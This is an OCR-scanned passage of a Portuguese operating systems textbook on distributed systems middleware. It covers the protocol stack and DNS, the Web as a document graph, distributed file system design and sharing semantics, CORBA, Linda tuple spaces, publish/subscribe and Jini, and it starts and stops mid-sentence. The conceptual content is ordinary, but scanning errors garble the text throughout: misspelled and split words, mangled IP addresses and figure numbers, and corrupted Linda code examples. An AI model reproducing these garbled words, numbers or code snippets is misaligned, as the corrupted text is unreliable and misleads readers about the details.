niimeros de seqiienrias, somas de verificaęao {checksums) e 
reiransmissoes de pacotes recebidos i n correta menie. Tudo 
isso e transpareme aos processos emissores e receptores. 
Elessimplesmente veem unia comunicaęao entre processos 
como conbayel, como um pipę do UNIX. 

Para entender como todos esses protocolos interagem, 
considere o caso mais simplcs de uma mensagem muito 
peąuena que nao precisa ser fragmemada em nenhum m- 
vel. O hospedeiro esta conectado a Internet via Ethernet, 
O que ocorre de falo? O processo do u su ario gera a mensa- 
gem e faz uma cha mada de sistema para envia-Ia por meio 
dc uma concxao TCP estabelecida previa menie. A pil ha de 
protocolos do mideo adidona um cabeęalho TCP e, depois, 
um cabeęalho IP na frente da mensagem. Em seguida, ela 
seguc para o driver Ethernet, que adidona um cabeęalho 
Ethernet dirccionando o pacote para o roteador da Inter¬ 
net. Esse roteador entao injeta o pacote na Internet, como 
most rado na Figura 832, 

Para estabelecer uma conexao com um hospedeiro re- 
moto (ou mesmo para erwiar um datagrama), e necessario 
saber sen endereęo IP. Visto que o gerendaniemo de listas 
de endereęos IP de 32 bits e inconveniente para as pesso- 
as, um esquema chamado de DNS {domain nume servke — 
servięo de nomes dc dominio) fol desenvolvido como 
uma base de dados que mapeia nomes em código ASCII 
para os endereęos IP dos hospedeiros. Assim, e posswel 



I Figura 8,32 Acumulo de cabegalhos de pacotes. 
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usar o nome star.cs.vu.nl do DNS em vez do endereęo IP 
13037.24.6 correspondente. Os nomes do DNS sao ampla - 
menie conheridos porque os endereęos de email da Inter¬ 
net sao da forma iwmc-do-urnario@nome-dodwspeddro-rw- 
DNS. Essc sistema de nomeaęao pcrmite que o pr ogra ma de 
e-mail do hospcdciro emissor procurc o endereęo do hos- 
pedciro dcstinatario na base dc dados do DNS, estabdeęa 
urna conexao TCP com o processo semdor de e-mail (mai! 
daenwn) remoto e envie a mensagem como urn arquivo. 0 
uome-do-usuńm e etwiado jun tanienie para identificar em 
qual caixa do correio a mensagem deve ser colocada. 

_ 8.4.31 Middleware com base em 

documentos 

Agora que lei nos algom conheeimento sobre redes e 
pro Loco! os, e possfvel abordar as difcrentes ca mad as de 
middleware que podern sobrepor a rede basica para produzir 
urn paradigma consistente para aplicaęoes e u su a ri os. Inida- 
remos com urn exemplo simples e bem conhecido: a Rede 
Mundial de Compuladores (Wt?r/<Y Wide Web). A Web foi in- 
ventada por Tim Bemers-Lee no CERN, o Centro de Pesąui- 
sa Ffsica Nu elear Europę u, em 1989, e, desdc entao, tem sc 
ampliado como urna explosao porsobre to do o mm ido. 

O paradigma ongi na! da Web era muito simples: ca da 
compuiador pode possuir um ou mais documetiLos, clia- 
matlos de paginas da Web. Gada pagina da Web pode 
conter iextos, imagens, fcones, sons, filmcs etc., bem como 
hyperiinks (ponteiros) para outras paginas da Web, Quan- 
do um usuario solicila urna pagina da Web u sarnio urn pro- 
grama chamado navegador da Web, a pagina e mostrada 
na tela dc vfdeo + O dique do mouse sobre um link faz com 
quc a pagina atuai seja substitutda pela pagi na a pomada 
pelo link. Embora ten ha m sido rece mcm cnie iniroduzi- 
das muitas caracteristicas exageradas na Web, o paradigma 
fundamemal ainda esta nitidamenie preseme: a Web c um 
grandę grafo dirlgido de documentos que podem apontar 
para outros documentos, como mostra a Figura 833. 

Gada pagina da Web tem um cndercęo ilnico, chamado 
de URL [uniform resource locatcr — localizador u ni formę de 


recursos), na forma pmocolo://nome-no-DNS/łwme-do-arqiu- 
vo. O proioeolo mais co mu menie usado c o http (hypertext 
transfer protocol — protocolo de transferenria de hipenex- 
tos), mas tambem existem o ftp e outros. Depois, vem o 
nome no DNS do hospedeiro que eon tem o arquivo. Por 
firn, ha um nome de arquivo local que informa qual arqui- 
vo esta sendo solicUado- 

A mancira como o sistema todo sc imifica e mostrada 
a seguir. A Web e funda niemal menie um sistema dienie- 
-senidor, cm quc o usuario e o clicmc e o sile da Web 
e o servidor. Quando o usuario fornece o URL ao nave- 
gador, seja digitando-o ou clieando em um hyperlink na 
pagina atuai, o naveg$dor exeeuta certos passos para bus- 
car a pagina da Web reąmsitada. Como exempk>, suponha 
que o URL fornecklo seja <http://wwwjninix3.org/doc/ 
faq.html>. O navegador r entao, executa os seguintes passos 
para obter a pagina: 

J. O navegador pergunta ao DNS pelo endereęo IP de 
<www.minix3.org>. 

2. O DNS responde com 13037,20.20. 

3. O navegadorabre uma eonexao TCP com a porla 80 
do endereęo 13037.20,20. 

4. Ele eniao envia uma requisięao perguntando pdo 
a rq u i vo doc/ftuj. htm l 

5. O servidor <www.minix3.org> envia o arquivo dcc/ 
faq.html 

6. A conexao TCP e liberada. 

7. O navegador mostra na tcla todo o tcxto em 
doc ffaq.html. 

8. O navegador busea e mostra na tela lodas as irna- 
gens cm dodfaq.html. 

De modo generico, esses passos formam a base da Web 
e mosiram como ela fu nc i ona. Muitas outras caracterfsti- 
cas tem sido adicionadas a Web basica, induindo planilha 
de estilos, paginas da Web duiamicas geradas em tempo de 
execuęao, paginas da Web com pequenos programas ou 
scdpts que executam na inaąuina clientc etc., mas elas cs- 
tao fora do escopo desta discussao. 



I Figura 8.33 A Web e um grandę grafo dirigido de documentos. 
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- 8A41 Middleware baseado no sistema de 

arquivos 

A kicia basica da Web z faz.er urn sistema distribuido 
pareecr uma coleęao gigante de documentos imerligados 
por mci o dc hypcriinks, Uma seguuda abordagcm consistc 
cm fazer urn sistema distribuido parccer urn grandę sistema 
dc arquivos, Ncsta scęao, vcremos algumas ąuestoes cn- 
vo!vidas no projeto de urn sistema dc arquivos dc alcance 
mundial. 

Usar o modelo dc urn sistema dc arquivos para urn sis¬ 
tema distribuido significa que existc nm unico sistema de 
arquivos global cm que todos os u su a nos do mundo sao 
capaz.es dc ler c escrcvcr em arquivos para os quais ten ha m 
auiorizaęao. A comunicaęao e realizada ąuando um pro- 
cesso escrevc dados em um arquivo c o outro lć os mesmos 
dados dc volia. Muitas ąuestoes cios sistemas de arquivos 
corwendonais aparecem nesse caso, mas algumas novas 
ąuestoes reladonadas a distribuięao aparecem. 

Modelo de transfer^ncia 

A primcira ąuestao e a escolha entre o modelo up- 
load/download e o modelo de acesso remoto. No 
primciro caso, mostrado na Figura 8*34(a), um processo 
accssa um arqiuvo primciro copiando-o do servidor rcmo- 
to onde de esta para acessa-lo I ocal men tc. Se o arquivo e 
só para ser lido, dc z, entao, lido localmcnte para provcr 
alto desempenho* Se o arquivo c para ser escrito, dc e cs- 
crito localmcnte. Quando o processo lermina dc acessa-lo, 
o arqirivo atualizado e colocado de volla no senddor. Com 
o modelo de acesso remoio, o arquivo permanece no ser- 
vidor e o diente cnvia comandos para quc o trabaiho seja 
kito no semdor, como mostra a Figura 8.34(b). 

As vantagens do modelo uploadfdmmload sao su a sim- 
plicidade e o falo dc a transferencia de um arquivo imciro 
de uma vez ser mais di cienie que su a transferenda em 
pcąuenas partes. As desvantagens sao a necessidade de 
havcr basta mc cspaęo de armazenamento para cabcr o 
arquivo todo localmcnte, a transferćncia do arquivo lotio 
ąuando somente panes dek sao necessarias e os proble- 
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mas de consistencia que surgeni ąuando existem multi- 
plos n su a ri os concorrentes. 

A hterarąuia de diretório 

Os arquivos sao somente parie da historia. A outra 
parte e o sistema de diretório. Todos os sistemas de ar- 
quivos distribmdos su porta m diretórios comendo muhi- 
plos arquivos. A ąuestao seguinte do projeto e saber se 
todos os client es tern a mes ma visao da hierarąuia de di¬ 
retório. Como excmplo do que ąueremos dizer com cssa 
observaęao, considcre a Figura 8.3 5, Na Figura 8.3 5 (a), 
mostramos dois servidorcs dc arquivos, cada um com tres 
diretórios e alguns arquivos. Na Figura 8.35 (b), temos um 
sistema no qual todos os cliemes (e outras maąuinas) tern 
a mesma visao do sistema de arquivos distribuido* Sc o 
caminho /D/H/x e valido em unia maąuina, ele e valido 
em todas as demais. 

Em comraste, na Figura 8.35(c) r maąuinas diferemes 
podein ter visóes diferemes do sistema de arquivo5. Para 
repetir o exemplo anterior, o caminho /D/E/x pode mui- 
to bem ser valido para o diente 1, mas na o para o clien- 
te 2. A Figura S35 (c) mostra o modelo para sistemas que 
gerendam multiplos servidorcs de arquivos por mcio de 
montagem rcmota {ranote nmmiitHj). Ele e flexivd z direto 
para implementar, mas tein a desvamagem de nao fazer o 
sistema todo comportar-se como um unico sistema de tem¬ 
po compartilhado iradirional. Em um sistema de tempo 
compartilhado, o sistema de arquivos parece o mesmo para 
qualquer processo, como no modelo da Figura 8.35(b). 
Essa propriedade toi na o sistema mais la dl de programar 
c compreendcr. 

Uma ąuestao intimamente reladonada e se existe on 
nao um diretório-raiz global que todas as maąuinas rcco- 
riheęam como a raiz. Para se ler um diretório-raiz global 
pode-sc, por exeniplo, ter a raiz contendo uma entrada 
para cada scrvidor z nada mais. Nessas condięócs. os cami- 
nhos lica m no forma to /server/path, que leni suas próprias 
desvantagens f mas pelo menos e o mesmo em qualquer 
parte do sistema. 


i. Ctiente busca arquivo 



Arquivo antigo 
Arquivo novo 


2. Acessos sao Quando o diente term!na, 
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1 Figura 8.34 (a) O modelo uptoad/downtoad. (b) O modefo de acesso remoto. 
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Servidor de arquivos 1 


Cliente 1 


Cliente 1 



Servidor de arquivos 2 


Cliente 2 


Cliente 2 
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Figura 8.35 (a) Dois servidoms de arquivos. Os quadrados Sao dinelórios e os circulos sao arquivos. (b) Um sistema no qual todos 
os clientes tem a mesma visao do sistema de arquivos. (c) Um sistema no quaF cEientes diferentes podem ter visóes diferentes do 
sistema de arquEvos, 


Transparenda de nomeaęao 

O problcma pnncipal com essc lipo dc nomeaęao e quo 
dc nao ć lotal nieme transpa renie. Duas for mas dc Lranspa - 
rencia sao rdevantes nesse contesto e sao dc importancias 
distintas. A primeira, transparencia de tocalizaęao, sig- 
nifica quc o nome do caminho na o to mc cc nenhuma dica 
de on de o arquivo esta localizado. Um caminho do Mpo 
hemido r U di rl/dir2/x i n forma a t o d os q u e x esta I oca ] i za d o 
no serWdor l # mas nao diz ondc o semdor $e encontra, O 
senddor esta Nvre para sc mover para ondc gtiiscr na redc 
sem que o nonie do caminho tenha dc ser altcrado. Assim, 
esse sistema tern transparencia de locaflzaęao. 

Contudo, suponhamos que o arqnivo A seja extrema- 
mente grandę e o espaęo seja li mi ta do no servidor 1. Alem 
disso, considercmos qtie cxista abundancia dc espaęo no 
senddor 2, O sistema pode muito bem mover x ‘para o servi- 
dor 2 de modo automatieo* Infdizmente, quando o primei- 
rocomponeme dc qualquer nonie dc caminho e o semdor, 
o sistema nao pode, auto ma lica menie, mover o arquivo 
para o outro servidor r mesmo quando dirl e dirl existem 
em ambos os servidorcs. O probiema e que mover o ar- 
quivo automaiieamente altera seu nome de caminho de 


/semdor i/dirl Zdir2/x pa ra /servidor2/dir I /dir2/x r O s p rog ra - 
mas que trabalbam com o primeiro caminho, eon form e es- 
pecificado dentro dos códtgos dcl es, vao parar de trabalhar 
se o caminho for al te rad o. Um sistema no qual os arquivos 
sao passfveis de ser movidos sem que sens nomes sejam 
trocados possui independencia de localizaęao. Um sis- 
tema distribuido que especifica os nomes das maqinnas ou 
dos servidores dentro dos nomes dos caminhos certamen- 
te nao e independent c de localizaęao. Um sistema que se 
baseia na montagem rernota tampon co o ź, visto quc nao 
c possivel mover um arquivo dc um grupo de arquivos (a 
tmidade dc montagem) para outro c ainda ser capaz de 
usar o nome do caminho anligo* A independencia de ioca- 
lizaęao naoe facil de implementar, mas e u ma propriedade 
desejavel nos sistemas distribindos. 

Para resumir o que foi dito atc aqui, existem tres abor- 
dagens comuns para a nomeaęao de arquivos c diretórios 
cm um sistema distribuido; 

1, Nomeaęao de maquina + caminho, como fmaąmnaf 
caminho o u maquina:cammho. 

2 . Montagem de sistemas dc arquivos remotos sobre a 
hierarguia local de arquivos. 
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3. Um unito espaęo de nomes que parece o mesmo em 
todas as maąumas. 

Os dois primciros sao facds de implcmentar, espccial- 
mente como uma maneira de conectar sistemas existentes 
que nao foram projetados para uso disiribiudo, 0 ultimo 
e diflcil e requer um projeto tuidadoso, mas torna a vida 
mais facil para programadores e usuarios. 

Semantka do compartilhamento de arquivos 

Quando dois ou mais usuarios comparLilham o mesmo 
arquivo, ć neccssario dc ii ni r a semaiuica da leitura e da 
escrita de modo preciso para evitar problemas. Em siste- 
mas monoprocessadores, a semamica normalmerne esia- 
bdece qite, ąuando uma chamada de sistema read e feita 
após uma chamada dc sistema write, a chamada read retorna 
justamenie o valor quc loi escrito, como mostra a Figura 
S.3ó{a). Da mesma maneira, ąuando duas chamadas write 
ocoirem na seąucncia, seguidas pela chamada read, o va- 
lor lido e identico ao armazenado duranie a ultima escrita. 
Conseąucntemcme, o sistema foręa a ordenaęao de todas 
as chamadas dc sistema e todos os processadores veem a 
mesma ordenaęao, Vamos charnar esse modelo de consis- 
tencia seąuenciah 

Em um sistema distritnudo, a consisLćnria seąuendal 
pode ser rcalizada facilmente enąuanto existir apenas um 
scrvidor de arquivos e os etientes nao usarem cache para 


sens arquivos. Todas as chamadas read e write sao direciona- 
das diretamente para o servidor de arquivos, sendo proces- 
sadas de modo estritamcme seąuencial. 

Na pratica, porem, o desempenho de um sistema dis- 
tribufdo e freąuentememe baixo ąuando todas as reątiisi- 
ęoes de arquivos sao direcionadas para um u ni co servidor, 
Esse problema muitas vezes e resolvido ąuando os cliemes 
Lem a permissao dc manier cópias loeais em suas caches 
privadas dos arquivos mais usados. Gontu do, sc o dientc 
i modificar a cópia de um arquivo em sua cache local e 
depois o diente 2 ler o arquivo do $ervidor, o segundo 
cliente obiera um arquivo obsoleto H ton formę il ust rad o na 
Figura 836(b). 

Uma saida para isso e propagar todas as mudanęas das 
cópias que estao na cache imediatamente de volta para o 
servidor. Embora seja conceitualmente simples, essa esira- 
legia e ineficiente, Uma soluęao aitemativa e relaxar a śc¬ 
inani i ca do compartilhamento dearqnivos. Em vcz de fazer 
uma chamada read para ver os efeitos dc todas as chamadas 
write anteriores, pode existir uma nova regia quc diga: "As 
mudanęas em um arquivo aberto sao visfveis inidalmente 
apenas ao processo que as originoti. Sometne ąuando o ar- 
qttivo e fechado, as mudanęas passam a ser visweisa outros 
processos". Aadoęao dessa regra nao allera o que ocorre na 
Figura 8.36(b), mas redefine o compor ta niemo real (£ob- 
tendo o valor odginał do arquivo) como o correto. Quando 


Processador On i co 
1, Escrita de 'c r 



Arquivo 


2. Leitura obtśm 'abc 1 

(a) 


Cliente 1 



(b) 


Figura 8.36 fa) Cortsistencia sequenciaL (b) Em um sistema distribuido com cache, a leitura de um arquivo pode retornar um valor 
I obsoEeto. 
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o diente J fecha o arquivo, ele envia unia cópia de volta 
para o seryidor, de modo que cliamadas read subsequentes 
obtem o novo valor, como esigido. Efetivameme, esse e o 
modelo upload/dow nlcad da Figura S.34. Essa regra seman- 
tica c amplamcme implementada, sondo conhccida como 
semantica de sessao, 

Com o uso da semantica de sessao, surge a questao 
sobre o que acontece se dok ou mais Client es estlverem 
simultaneamente utilizando suas ca che s e modificando o 
mesmo arquivo. Urna soluęao diz que cada arquivo deve 
ser fechado um após o outro, sendo sous valores enviados 
dc volta para o seryidor, dc modo que o resultado finał dc- 
pendc dc quem fecha por ultimo. Unia altemativa menos 
agradavd mas ligeiramcnte mais facil dc implcmcmar diz 
quo o resultado finał e um entre varios candidatos c, assirn, 
a escolha nao e especificada. 

Urna abordagem alternativa a semantica dc sessao 
e usar o modelo itphad/download , mas automaticamcnte 
coiocar travamento {lock} no arquivo quc tenha sido bal¬ 
lado. As tcntativas dc outros clicnics dc baixar o mesmo 
arquivo scrao adiadas atć quc o primciro diente o tcnlia 
retomado. Sc cxistir urna grando dcmanda por um arqui- 
vo, o seryidor podera cnviar mensagens para o diente que 
o detem, apressando-o, mas isso pode ou nao ajudan Dc 
modo gerai, a obienęao da scmantica correta dos arquivos 
companiihados e um negocio complicado, sem soluęoes 
efidentes e elegantes. 

SAS I Middleware baseado em objetos 
comparlilhados 

Agora vamos olhar um lerceiro paradigma. Em vcz 
de dizer quc qualquer coka ć um documenio ou qualquer 
coisa e um arquivo, vamos dizer que qualquer coisa c um 
objęto, Um objęto ć urna eoleęao dc variavds quc sao cm- 
pacotadas com um conjumo dc procedimcntos de acesso, 
cha ma dos metodos, Nao sao permilidos aos proccssos 
accssarcm diretarn.cn te as variaveis, Em vez disso, des pre- 
cisam irwocar os meto dos. 

Algumas linguagcns de progratnaęao, como C++ e Java, 
sao orientadas a objetos, mas a objetos em mVel dc lingua- 
gem em vez de objetos em tempo de execuęao, Um sistema 
bern conhecido baseado cm objetos em tempo de execuęao e 
o CORBA {commoti object reąuest broker architecture) (Vinoski, 
1997). O CORBA e um sistema dicmc-servidor, no qual os 
proccssos clicmes localizados cm maąuinas diemes podem 
irwocar operaęoes sobre objetos localizados em maquinas 
servjdoras (possivelmente remotas). CORBA foi projetado 
para um sistema heterogeneo que execu La unia varledade 
dc plataformas de hardware c de sistemas operacionais e e 
programado cm urna variedade dc linguagcns. Para possi- 
bililar quc um clicntc em unia piatalonna iiwoąue um scr- 
vidor em outra piata forma di terenie, ORBs (object reąucsi 
krakers — agenlcs dc solidtaęao de objetos) sao colo ca dos 
entre o diente e o serviddr para permitir que eles se corres- 


pondam. Os ORBs desempenham um imponame papel no 
CORBA, ate mesmo fornecendo seu nome ao sistema. 

Todo objęto do CORBA c definido por urna imerfa- 
ce cm uma linguagem cha mada IDL (interface defimtion 
language — linguagem de definięao de i mer face), que diz 
quais metodos o objęto exporia e que lipos de parametros 
cada um espera. A espeeificaęao IDL pode ser compilada 
em um pracedimemo do tipo stub no diente e armazena- 
da em tama biblioteca. Se um proeesso diente sabe ame- 
cipadamente que ele predsara acessar certo objęto, dc ć 
liga do com o código do stub do clicntc daqu.de objęto* A 
especifkaęao IDL tambem pode ser compilada cm um pro- 
cedimento esąueleto (skeleton), que c u sad o do łado do 
scrvidor, Sc o seryidor nao sabe antedpadamemc quais ob¬ 
jetos do CORBA um proeesso predsa usar, uma invocaęao 
dinamica tambem e possfyel, mas o modo como isso e Eeito 
esta alem do escopo deste livro. 

Quando um objęto CORBA e criado, urna referenda 
a de tambem e eriada e retornada para o proeesso criador. 
Essa referenda e como o proeesso identifica o objęto nas 
iiwocaęoes subsequentes de sens metodos. A referenda 
pode ser passada para outros proccssos ou armazenada em 
um direiório do objęto. 

Para invocar um metodo em um objęto, um proeesso 
cliente deve primeiro adąuirir uma referenda ao objęto. 
A referenda pode vir diretamente do proeesso criador ou, 
mais provavelmente, por uma procura por nonie ou por 
funęao em algum lipo de diretório. Uma vcz quc a refe¬ 
renda ao objęto esta dispomvel, o proeesso diente prepara 
os parametros para as cha ma da s dos metodos cm uma es¬ 
tru tura conveniente e, entao, contata o ORB clicntc* Por 
sua vez, o ORB diente envia uma mensagem para o ORB 
scrvidor, quc rcalmentc invoca o metodo sobre o objęto. O 
mecanismo todo e siinilar a RFC. 

A funęao dos ORBs e cscoiider os dctalhes de comu- 
nicaęao e dktribuięap de baixo nfvel dos eódigos do clientc 
e servidor. Em particulao os ORBs escondcm do clicntc a 
locaiizaęao do seryidor, se o scrvidor e um programa bi- 
nario ou um script, qual c o hardware e qual e o sistema 
operacional em que o seryidor executa, se o objęto esta 
atualmeme ativo e como os dois ORBs se comunicam {por 
exemplo, via TCP, RFC, niemória compartilhada etc,). 

Na primeira vcrsao do CORBA, o protocolo entre o 
ORB clientc c o ORB seryidor nao foi espcdficado. Como 
resultado, cada yendedor de ORB usava um protocolo dife- 
renie c dois deles nao podiam conver$ar um com o outro* 
Na versao 2.0, o protocolo foi especificado. Para a cotnuni- 
caęao na Internet, o protocolo e chamado de IIOP {Internet 
InlerOrb Protocol — protocolo interorb da Internet). 

Para tornar posswel o uso dc objetos no sistema COR¬ 
BA que nao foram escritos para CORBA, todo objęto pode 
ser equipado com tim adaptador de objęto. Esse adap- 
tador e um iiwólucro que reaiiza larefas como o registro 
de um objęto, a geraęao de referencias a um objęto e a 
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I Figura 8,37 Os elementos principals de urn sistema distribuido baseado em CGRBA. As partes CORBA estio pintadas de dnza. 


ativaęao de um objęto que e invocado P mas nao esta ativo. 
A organizaęao de todas essas partes do CORBA e mostrada 
na Figura 8.37. 

Um problema serio com o CORBA e que cada objęto 
esta localizado em somente um servidor, o que significa 
que o desempenho sera hornvd para os objetos usados 
intensamente cm maąuinas clientes ao rcdor do mundo. 
Na prali ca, o CORBA fundona a pen as dc modo aceita- 
vel em sistemas de pcquena escala, como conectar pro- 
cessos em um computador, em urna LAN ou dentro de 
uma u ni ca companhia. 

8A61 Middleware com base em 
coordenacao 

Nosso ultimo paradigma para um sistema distribuido 
e chamado de middleware com base om coordenaęao. 
Comeęaremos pelo sistema Linda — um projeio de pesqui- 
sa academica que se miciou nessa area — e depois veremos 
dois excmplos comcrciais totalmcme inspirados ndc: pu- 
blica / inscrev e (publish i su bcribe) e 3 i n i, 

Linda 

Linda c um sistema moderno para comunicaęao e sin- 
cronizaęao deseńvolvido na Universidade de Yale por Da- 
vid Gelernter e seu aluno Nick Carriero (Carriero e Gelern¬ 
ter, 19S6; Carriero e Gelernter, 19S9; Gelernter, 1985). No 
sistema Linda, os proccssos independentes se comunicam 
via um espaęo de tuplas abstrato. O espaęo de tuplas e 
global ao sistema todo e os processos em qualqner maqui- 
na podem inscrir ou rcmover tuplas no espaęo de tuplas 
sern comidcrar como e onde elas estao arinazenadas. Para 
o usuario, o espaęo dc tuplas se pareee com uma grandę 
memória compardlhada global como vimos de varias ma- 
neirasantes [e na Figura 8.21 (c)), 

Uma tupią e como uma estrmura em C ou Java. Ela 
e ęonstUufda de um ou mars campos, e cada um e um va- 
lor de algum tipo suportado pela linguagem-base (Linda e 
implememada pela adięaode urna biblioteca a uma lingua- 
gem existente, como C). Para C-Linda, os tipos dos campos 
induem niuneros iriteiros, inteiros longos e deponto llutti- 


ante, bem como tipos compostos, como vetores (induindo 
cadeias de caracteres) c estru tu ras (mas nao o u tras tuplas), 
Diferentemcnte de objetos, as tuplas sao dados puros — 
nao tern metodos associados. A Figura 838 tnostra tres tu¬ 
plas como exemplo. 

Quatro operaęóes sao fornecidas sobie as tuplas. A pri- 
meira delas, out, coloca uma tupią no espaęo de tuplas. For 
exempIo, 

outfabc”, 2, 5); 

coloca a tupią ("abc", 2, 5) dentro do espaęo de tuplas. Os 
campos de out normalnienie sao constantes, variavds ou 
cxpress6es, como em 

outfmatrbt-l 1 ', i. j, 3.14); 

que coloca uma tupią com quatro campos, o segundo e ter- 
ceiro dos quais sao delermtnados pdos valores atuais das 
variavds i e /, 

As tuplas sao resgatadas do espaęo de tuplas pela pri- 
mitiva in. Elas sao endcrcęadas pdo contciido cm vcz de 
por nomes ou cndereęos. Os campos dc in podem ser cx- 
prcssócs ou para metr os formais, Considere, por cxcmplo, 

infabc™, 2 , ?i); 

Essa operaęao 'pesquisa' o espaęo de tuplas a procu- 
ra da tupią que consiste na cadeia de caracieres 'abel o 
inteiro 2 e um terceiro carnpo contendo qualquer inteiro 
(presumindo que /seja um inteiro), Se encontrada, a tupią 
6 removida do espaęo de tuplas e a variavel / ć assoriada 
ao valor do terceiro carnpo, A eorrespondenda {matchim) 
e a remoęao sao atomicas r de modo que, se dois processos 
executam a mesma operaęao in simultaneameme, apenas 
um deles sera bem-sucedido, a menos que existam duas 
ou maLs tuplas correspondentes. O espaęo de tuplas pode 
conter miiltiplas cópias da mesma tupią. 

Cabc" ,2,5) 

(“matrix-1", 1, 6, 3.14) 

(“family", "is-sister", "Stephany", "Roberta") 

I Figura 8.38 Tr£s tuplas no sistema Linda. 
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O algoritmo de correspon dencia usado por in e direio. 
Os campos da primitiva In, cha mada de modelo (temptete), 
sao comparados {concdtualmentc) aos campos correspondon¬ 
ieś de cada tupią no espaęo de tuplas. Uma correspondenda 
ocorre se as tres condięoes seguim.es sao satisfeitas: 

1. O modelo e a tupią tern o mesmo numero dc campos. 

2. Os tipos dos campos correspondemes sao iguais. 

3. Cada constanie ou variavd no modelo correspon de 
a seu campo na tupią. 

Parainetros formais, indicados por um sinal de inier- 
rogaęao, seguidos por um nome de variavel ou iipo r nao 
participam da correspondenda (exceto para verificaęao 
de Lipos), embora aqudes que contem um nome de va- 
riavel sejam associados após uma correspondenda bem- 
-succdida. 

Se nao existe nenhuma tupią correspon dem e, o pro- 
cesso chamador e suspenso ate que outro proeesso insira 
a tupią necessaria, ąuando, entao, o chamador e auto¬ 
mat ica menie acordado para rcccbcr a nova tupta, O fato 
de os proccssos serem bloąucados c desbloqueados auto- 
maticameme significa que, se um proeesso esta a porno 
de colocar unia tupią e outro proeesso esta a porno de 
obter a mesma rupia, nao imeressa quem chega primei- 
ro. A unica diferenęa e que r se o in executar antes do 
out, ocorre ra um atraso desprezml ate quc a tupią esteja 
disponivd para a rcmoęao, 

Pode ser uma vantagem o fato de os processos serem 
bloqueados quando a tupią necessaria nao esta presente. 
Por exempio, essa situaęao pode ser usada para implemen- 
tar semafor os. Para criar ou fazer um up em um semaforo 
S , um proeesso pode cxccułar 

outfsemaforo S 1? ); 

Para fazer um down, ele pode executar 

infsemaforo S”); 

O estado do semafor o S e determinado pelo nu mero 
de tuplas ('semaforo $') no espaęo de tuplas. Se nao exisiir 


nenhuma, qttalquer tentativa de obter uma tupią sera blo- 
queada ate que algum outro proeesso forneęa uma. 

Alćm das primitivas out e in, Linda tambem lem uma 
primitiva nad, que se parece com in cxceto por nao remo- 
ver a tupią do espaęo de tuplas. Bxiste ainda uma primiiiva 
eval, que faz com que sens parametros sejam avaliados em 
paralelo e a lupla resultame seja colocada no espaęo de tu¬ 
plas. Esse mecanlsmo pode ser empregado para executar 
uma computaęao arbitraria. fi assim que os processos para- 
Idos sao criados no sistema Linda. 

Pu b I ica/i u screve (publish/subscribe) 

Nosso próximo exemplo de um modelo baseado em 
coordenaęao foi inspirado em Linda e e chamado de publi- 
ca/inscreve (publishńubscribe) (Oki et aL, 1993). Ele eon- 
siste em um numero de processos conectados por uma rede 
de difusao (hwadcast). Cada proeesso pode ser um produior 
ou um consu mi dor de informaęao, o u a mb os. 

Quando um produtor de informaęao lem uma nova 
informaęao (por exemplo, um novo preęo para aęoes), ele 
difunde a informaęao, na forma de tupią, na rede. Essa 
aęao e cha mada de publkaęao (publiskwg), Cada lupla 
contem uma lin ha hierarąuica de assuntos com multiplos 
campos separados por pontos. Os processos interessados 
cm certa informaęao pod cm sc inscrever (subscribe) cm 
determinados assuntos, inclusive usando sfmbolos na lin ha 
dc assunto. A inscrięao e fcita instruindo um proeesso dae- 
mon de tuplas, na mesma maquina que monitora as tuplas 
pubłicadas, sobre ąuais assuntos procurar. 

Publica/inscreve e implcmcntadocomo ilustra a Figura 
8.39. Quando um proeesso tein uma lupla para publicar, 
ele a difunde na LAN local. O daemon de tuplas em cada 
maąulna copia todas as tuplas diFimdidas para dentro de 
sua RAM. Ele, en ta o, inspeciona a linha de assunto de cada 
tupią para veriiicar quais processos estao interessados nela, 
transferindo uma copia da tupią para cada proeesso ime¬ 
ressa do. As tuplas tambem podem ser difundidas em uma 
rede dc longa distanria ou na Internet utilizando uma ma- 
ąuina cm cada LAN como roicadora de informaęao, para 



Roteador de informaęao 


l Figura 8,39 A arguitetura publica/inscreve. 
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coleiar lodas as tu pi as publicadas e, depois, as redirecionar 
para outras LANs para que sejam lambem difimdtdas la. 
Essc rediredonamento pode ainda ser feito de modo inte- 
Egente, apenas rediredonando mna tupią para uma LAN 
rcmota somente ąnando cssa LAN tivcr pdo mciios urn 
inscrito quc dcscjc a referida tupią. Para isso, c necessario 
quc os roteadores dc mfonuaęao troąucm informaęao so- 
bre os inscritos. 

Yarios tipos de semantica po dem ser iniplementados, 
inclusive com entrega conJiavel e entrega ga rant id a, mes- 
mo na presenęa de donos no sistema. No segnndo caso, e 
necessario armazenar as mplas antigas para o caso de elas 
serem requisitadas no futuro. Uma mancira dc armazena- 
-las c ligar um sistema dc banco dc dados ao sistema c osa¬ 
do para inscrcver lodas as tu pląs* Isso pode ser feito rcvcs- 
tindo-se o sistema de banco de dados em um adaptador, a 
firn de permUir que um banco de dados existeme trabalhe 
com o niodelo publica/inscreve. As tuplas chegam, o adap- 
tador captura todas elas e as coloca no banco de dados. 

0 modclo publica/inscrcvc separa lotalmcme os pro- 
dutores dos eon sum ido res, como feito pcio Linda. Cont li¬ 
do, algumas vczes e util saber quem mais esta mieressado 
em algo. Essa informaęao pode ser adąuirida por meio 
da publicaęao de uma tupią que basicamente pergunta: 
"Quem mais esta interes&ado em xT. As resposias vokani 
na forma de tuplas que dizem: *Eu estou interessado em/. 

ilni 

Du ranie 50 a nos, a computaęao tern sido ceniralizada 
na CPU; um compuiador e visto como um dispositivo sol- 
to que consiste em uma CPU, a [guma memória prima ria e 
quase semprc algum armazenamento em massa, como um 
disco. Jtni (uma variantc de 'Genio'), da Sun Microsystems, 
e uma lcmativa de mudar csse modelo par a um que possa 
ser descriio como centmlizado em rede (Waldo, 1999). 

O mundo Jini consiste em urn grandę numero de 
dispositivos Jini lndependeni.es, cada um dos quais olere- 
cendo um ou mais servięos para os outros. Um dispositivo 
Jini pode ser conectado em uma rede para oferecer e usar 
semęos instanianeainentc, sem qualquer procedimento 
complcxo de inslalaęao. Notę que os dispositivos sao co- 
nectados cm uma rede, e nao em um compuiador, como 
normalmcntc ć o caso. Um disposiuvo Jini poderia ser um 
compuiador tradicional, mas tambem uma impressora, 
um palmtop, um telcfonc edular, urna TV, um aparelho de 
som o u outro disposilWo com urna CPU, algurna memória 
e uma concxao dc rede (po$$ivel menie sem Go). Um sis¬ 
tema Jini e urna federaęao frouxa dc dispositicos Jini quc 
podem entrar ou sair dc acordo com seus interesses, sem 
qualquer administraęao centralizada. 

Quando um dispositivo Jini quer se juntar a uma fe¬ 
deraęao Jini, cle difunde um pacotc pe!a LAN local ou por 
uma celula local sem fio perguntando se existe um servięo 
